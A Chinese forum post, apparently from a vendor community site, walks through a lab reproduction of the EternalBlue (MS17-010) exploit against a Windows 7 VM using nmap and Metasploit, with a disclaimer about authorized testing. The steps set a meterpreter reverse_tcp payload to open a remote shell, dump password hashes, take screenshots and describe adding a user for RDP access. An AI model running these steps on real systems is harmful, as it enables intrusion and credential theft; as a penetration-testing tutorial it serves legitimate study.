渗透测试实战之永恒之蓝ms17_010复现
  

富贵花开 3190

{{ttag.title}}
本帖最后由 富贵花开 于 2025-3-7 21:18 编辑

免责说明:


1. 目的
本免责声明旨在明确渗透测试的范围、责任及限制,确保测试在法律和合同框架内进行。

2. 授权
渗透测试必须在客户明确授权后进行,未经许可的测试将被视为非法行为。

3. 范围
测试仅限于客户指定的系统和网络,不得超出授权范围。



实验环境:
攻击机:kali 192.168.10.196
靶机:win7 192.168.10.202


永恒之蓝ms17_010  利用的是 win7的 445端口
咱们这次主要是利用445端口来获取目标主机的meterpreter权限以及cmd权限
1.检测靶机445端口是否开启
nmap -sS 192.168.10.202

2.使用命令:msfconsole打开MSF命令台,出现msf6 > 的命令行即为成功

使用命令:search 17-010搜索,选择下面这个攻击模块
使用use 3 看靶机是否存在 永恒之蓝ms17_010 漏洞
配置Rhosts 地址为靶机地址
然后开始run  看是否存在漏洞

发现存在漏洞 用 use 0  进行攻击
配置 靶机 和 攻击机 的地址

配置线程 set payload windows/x64/meterpreter/reverse_tcp


然后开始进行攻击:run

出现以下字样即为攻击成功  输入ipconfig  看看是不是win7的地址

然后拿到shell

然后根据Windows的命令 添加用户  然后加入权限 直接3389 就登录了 这里我就不演示了。

我们来查看下win7管理员的账号密码
输入 hashdump

获取屏幕screenshare

打赏鼓励作者,期待更多好文!

打赏
2人已打赏

wukun 发表于 2025-3-6 08:27
  
发表新帖
热门标签
全部标签>
每日一问
新版本体验
产品连连看
安全效果
纪元平台
功能体验
标准化排查
GIF动图学习
信服课堂视频
【 社区to talk】
安装部署配置
社区新周刊
流量管理
平台使用
云化安全能力
畅聊IT
技术笔记
上网策略
每周精选
高手请过招
全能先锋系列
答题自测
专家问答
技术圆桌
在线直播
MVP
网络基础知识
升级
安全攻防
测试报告
日志审计
问题分析处理
每日一记
运维工具
用户认证
原创分享
解决方案
sangfor周刊
VPN 对接
项目案例
SANGFOR资讯
专家分享
技术顾问
信服故事
SDP百科
功能咨询
终端接入
授权
设备维护
资源访问
地址转换
虚拟机
存储
迁移
排障笔记本
产品预警公告
玩转零信任
S豆商城资讯
技术争霸赛
「智能机器人」
追光者计划
2023技术争霸赛专题
卧龙计划
华北区拉练
天逸直播
以战代练
秒懂零信任
技术晨报
技术盲盒
山东区技术晨报
文档捉虫
齐鲁TV
华北区交付直播
2024年技术争霸赛
北京区每日一练
场景专题
故障笔记
排障那些事
西北区每日一问
升级&主动服务
高频问题集锦
POC测试案例
专家说
热门活动
产品动态
行业实践
产品解析
关键解决方案

本版版主

20
5
0

发帖

粉丝

关注

2
0
0

发帖

粉丝

关注

0
0
0

发帖

粉丝

关注

本版热帖

本版达人